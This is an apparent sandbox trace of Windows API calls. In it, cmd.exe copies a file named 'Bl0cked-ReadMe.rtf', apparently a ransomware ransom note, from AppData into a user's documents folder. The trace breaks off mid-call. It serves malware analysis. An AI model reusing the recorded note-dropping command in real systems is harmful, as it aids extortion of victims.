id = 34973 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 34974 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 34975 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 34976 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 34977 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 35210 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 35211 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 35212 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 35213 start_va = 0x1b0000 end_va = 0x1bffff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 35214 start_va = 0x4e0000 end_va = 0x5dffff entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 35215 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 35216 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 35217 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 35218 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 35219 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 35220 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 35221 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 35222 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 35223 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 35224 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 35225 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 35226 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 35227 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 35228 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 35229 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 35230 start_va = 0x1d0000 end_va = 0x1d0fff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 35231 start_va = 0x310000 end_va = 0x410fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 35232 start_va = 0x5e0000 end_va = 0x11dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 35233 start_va = 0x11e0000 end_va = 0x1342fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011e0000" filename = "" Thread: id = 866 os_tid = 0xba0 [0234.566] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30ff6c | out: lpSystemTimeAsFileTime=0x30ff6c*(dwLowDateTime=0xbf45bbc0, dwHighDateTime=0x1d440a9)) [0234.566] GetCurrentProcessId () returned 0xec [0234.566] GetCurrentThreadId () returned 0xba0 [0234.566] GetTickCount () returned 0x406c3 [0234.566] QueryPerformanceCounter (in: lpPerformanceCount=0x30ff64 | out: lpPerformanceCount=0x30ff64*=29135493520) returned 1 [0234.566] GetModuleHandleA (lpModuleName=0x0) returned 0x49fb0000 [0234.566] __set_app_type (_Type=0x1) [0234.566] __p__fmode () returned 0x76b331f4 [0234.566] __p__commode () returned 0x76b331fc [0234.566] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49fd21a6) returned 0x0 [0234.566] __getmainargs (in: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c, _DoWildCard=0, _StartInfo=0x49fd4140 | out: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c) returned 0 [0234.567] GetCurrentThreadId () returned 0xba0 [0234.567] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xba0) returned 0x38 [0234.567] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0234.567] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0234.567] SetThreadUILanguage (LangId=0x0) returned 0x409 [0234.567] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0234.567] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x30fefc | out: phkResult=0x30fefc*=0x0) returned 0x2 [0234.567] VirtualQuery (in: lpAddress=0x30ff33, lpBuffer=0x30fecc, dwLength=0x1c | out: lpBuffer=0x30fecc*(BaseAddress=0x30f000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0234.567] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x30fecc, dwLength=0x1c | out: lpBuffer=0x30fecc*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0234.567] VirtualQuery (in: lpAddress=0x211000, lpBuffer=0x30fecc, dwLength=0x1c | out: lpBuffer=0x30fecc*(BaseAddress=0x211000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0234.567] VirtualQuery (in: lpAddress=0x213000, lpBuffer=0x30fecc, dwLength=0x1c | out: lpBuffer=0x30fecc*(BaseAddress=0x213000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0234.567] VirtualQuery (in: lpAddress=0x310000, lpBuffer=0x30fecc, dwLength=0x1c | out: lpBuffer=0x30fecc*(BaseAddress=0x310000, AllocationBase=0x310000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0234.567] GetConsoleOutputCP () returned 0x1b5 [0234.567] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0234.567] SetConsoleCtrlHandler (HandlerRoutine=0x49fce72a, Add=1) returned 1 [0234.567] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.567] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0234.568] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.568] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0234.568] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.568] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0234.568] _get_osfhandle (_FileHandle=0) returned 0x3 [0234.568] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0234.568] _get_osfhandle (_FileHandle=0) returned 0x3 [0234.568] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0234.568] GetEnvironmentStringsW () returned 0x4f0198* [0234.568] FreeEnvironmentStringsW (penv=0x4f0198) returned 1 [0234.568] GetEnvironmentStringsW () returned 0x4f0198* [0234.568] FreeEnvironmentStringsW (penv=0x4f0198) returned 1 [0234.569] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30ee6c | out: phkResult=0x30ee6c*=0x40) returned 0x0 [0234.569] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30ee74, lpData=0x30ee78, lpcbData=0x30ee70*=0x1000 | out: lpType=0x30ee74*=0x0, lpData=0x30ee78*=0xc0, lpcbData=0x30ee70*=0x1000) returned 0x2 [0234.569] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30ee74, lpData=0x30ee78, lpcbData=0x30ee70*=0x1000 | out: lpType=0x30ee74*=0x4, lpData=0x30ee78*=0x1, lpcbData=0x30ee70*=0x4) returned 0x0 [0234.569] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30ee74, lpData=0x30ee78, lpcbData=0x30ee70*=0x1000 | out: lpType=0x30ee74*=0x0, lpData=0x30ee78*=0x1, lpcbData=0x30ee70*=0x1000) returned 0x2 [0234.569] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30ee74, lpData=0x30ee78, lpcbData=0x30ee70*=0x1000 | out: lpType=0x30ee74*=0x4, lpData=0x30ee78*=0x0, lpcbData=0x30ee70*=0x4) returned 0x0 [0234.569] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30ee74, lpData=0x30ee78, lpcbData=0x30ee70*=0x1000 | out: lpType=0x30ee74*=0x4, lpData=0x30ee78*=0x40, lpcbData=0x30ee70*=0x4) returned 0x0 [0234.569] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30ee74, lpData=0x30ee78, lpcbData=0x30ee70*=0x1000 | out: lpType=0x30ee74*=0x4, lpData=0x30ee78*=0x40, lpcbData=0x30ee70*=0x4) returned 0x0 [0234.569] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30ee74, lpData=0x30ee78, lpcbData=0x30ee70*=0x1000 | out: lpType=0x30ee74*=0x0, lpData=0x30ee78*=0x40, lpcbData=0x30ee70*=0x1000) returned 0x2 [0234.569] RegCloseKey (hKey=0x40) returned 0x0 [0234.569] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30ee6c | out: phkResult=0x30ee6c*=0x40) returned 0x0 [0234.569] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30ee74, lpData=0x30ee78, lpcbData=0x30ee70*=0x1000 | out: lpType=0x30ee74*=0x0, lpData=0x30ee78*=0x40, lpcbData=0x30ee70*=0x1000) returned 0x2 [0234.569] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30ee74, lpData=0x30ee78, lpcbData=0x30ee70*=0x1000 | out: lpType=0x30ee74*=0x4, lpData=0x30ee78*=0x1, lpcbData=0x30ee70*=0x4) returned 0x0 [0234.569] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30ee74, lpData=0x30ee78, lpcbData=0x30ee70*=0x1000 | out: lpType=0x30ee74*=0x0, lpData=0x30ee78*=0x1, lpcbData=0x30ee70*=0x1000) returned 0x2 [0234.569] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30ee74, lpData=0x30ee78, lpcbData=0x30ee70*=0x1000 | out: lpType=0x30ee74*=0x4, lpData=0x30ee78*=0x0, lpcbData=0x30ee70*=0x4) returned 0x0 [0234.569] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30ee74, lpData=0x30ee78, lpcbData=0x30ee70*=0x1000 | out: lpType=0x30ee74*=0x4, lpData=0x30ee78*=0x9, lpcbData=0x30ee70*=0x4) returned 0x0 [0234.569] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30ee74, lpData=0x30ee78, lpcbData=0x30ee70*=0x1000 | out: lpType=0x30ee74*=0x4, lpData=0x30ee78*=0x9, lpcbData=0x30ee70*=0x4) returned 0x0 [0234.569] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30ee74, lpData=0x30ee78, lpcbData=0x30ee70*=0x1000 | out: lpType=0x30ee74*=0x0, lpData=0x30ee78*=0x9, lpcbData=0x30ee70*=0x1000) returned 0x2 [0234.569] RegCloseKey (hKey=0x40) returned 0x0 [0234.569] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863c2 [0234.569] srand (_Seed=0x5b8863c2) [0234.569] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Bl0cked-ReadMe.rtf\"" [0234.569] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Bl0cked-ReadMe.rtf\"" [0234.569] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.570] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4f18f8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0234.570] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0234.570] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0234.570] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0234.570] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0234.570] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0234.570] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0234.570] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0234.570] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0234.570] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0234.570] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0234.570] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0234.570] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0234.570] GetEnvironmentStringsW () returned 0x4f22e8* [0234.570] FreeEnvironmentStringsW (penv=0x4f22e8) returned 1 [0234.570] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.570] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0234.570] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0234.570] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0234.570] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0234.570] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0234.570] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0234.570] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0234.571] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0234.571] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0234.571] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x30fc38 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.571] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x30fc38, lpFilePart=0x30fc34 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x30fc34*="Desktop") returned 0x18 [0234.571] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0234.571] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x30f9b4 | out: lpFindFileData=0x30f9b4) returned 0x4f0028 [0234.571] FindClose (in: hFindFile=0x4f0028 | out: hFindFile=0x4f0028) returned 1 [0234.571] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x30f9b4 | out: lpFindFileData=0x30f9b4) returned 0x4f0028 [0234.571] FindClose (in: hFindFile=0x4f0028 | out: hFindFile=0x4f0028) returned 1 [0234.571] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x30f9b4 | out: lpFindFileData=0x30f9b4) returned 0x4f0028 [0234.571] FindClose (in: hFindFile=0x4f0028 | out: hFindFile=0x4f0028) returned 1 [0234.571] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0234.571] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0234.571] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0234.571] GetEnvironmentStringsW () returned 0x4f2b08* [0234.572] FreeEnvironmentStringsW (penv=0x4f2b08) returned 1 [0234.572] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.572] GetConsoleOutputCP () returned 0x1b5 [0234.572] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0234.572] GetUserDefaultLCID () returned 0x409 [0234.572] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49fd4950, cchData=8 | out: lpLCData=":") returned 2 [0234.572] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x30fd78, cchData=128 | out: lpLCData="0") returned 2 [0234.573] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x30fd78, cchData=128 | out: lpLCData="0") returned 2 [0234.573] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x30fd78, cchData=128 | out: lpLCData="1") returned 2 [0234.573] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49fd4940, cchData=8 | out: lpLCData="/") returned 2 [0234.573] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49fd4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0234.573] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49fd4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0234.573] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49fd4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0234.573] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49fd4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0234.573] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49fd4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0234.573] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49fd4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0234.573] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49fd4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0234.573] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49fd4930, cchData=8 | out: lpLCData=".") returned 2 [0234.573] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49fd4920, cchData=8 | out: lpLCData=",") returned 2 [0234.573] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0234.574] GetConsoleTitleW (in: lpConsoleTitle=0x4e08f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.574] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0234.574] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0234.574] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0234.574] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0234.575] _wcsicmp (_String1="type", _String2=")") returned 75 [0234.575] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0234.575] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0234.575] _wcsicmp (_String1="IF", _String2="type") returned -11 [0234.575] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0234.575] _wcsicmp (_String1="REM", _String2="type") returned -2 [0234.575] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0234.579] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.579] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.579] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.579] GetFileType (hFile=0x7) returned 0x2 [0234.579] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0234.579] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30fc70 | out: lpMode=0x30fc70) returned 1 [0234.579] _dup (_FileHandle=1) returned 3 [0234.580] _close (_FileHandle=1) returned 0 [0234.580] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0234.580] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x30fc40, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0234.580] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0234.580] GetConsoleTitleW (in: lpConsoleTitle=0x30fa70, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.580] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0234.580] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0234.580] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0234.580] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0234.581] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.581] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x30f5d4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30f5d4) returned 0x4e0e90 [0234.581] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0234.581] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0234.581] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0234.582] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x30e4e0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0234.582] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0234.582] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.582] GetFileType (hFile=0x54) returned 0x1 [0234.582] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.582] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x30e538 | out: lpFileSizeHigh=0x30e538*=0x0) returned 0x1632 [0234.582] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.582] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0234.582] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.582] ReadFile (in: hFile=0x54, lpBuffer=0x30f370, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e560, lpOverlapped=0x0 | out: lpBuffer=0x30f370*, lpNumberOfBytesRead=0x30e560*=0x200, lpOverlapped=0x0) returned 1 [0234.582] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.582] GetFileType (hFile=0x4c) returned 0x1 [0234.582] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.582] GetFileType (hFile=0x4c) returned 0x1 [0234.582] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.582] WriteFile (in: hFile=0x4c, lpBuffer=0x30f370*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f370*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.583] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.583] GetFileType (hFile=0x4c) returned 0x1 [0234.583] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.583] WriteFile (in: hFile=0x4c, lpBuffer=0x30f3c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f3c0*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.583] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.583] GetFileType (hFile=0x4c) returned 0x1 [0234.583] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.583] WriteFile (in: hFile=0x4c, lpBuffer=0x30f410*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f410*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.583] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.583] GetFileType (hFile=0x4c) returned 0x1 [0234.583] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.583] WriteFile (in: hFile=0x4c, lpBuffer=0x30f460*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f460*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.584] _get_osfhandle (_FileHandle=1) returned 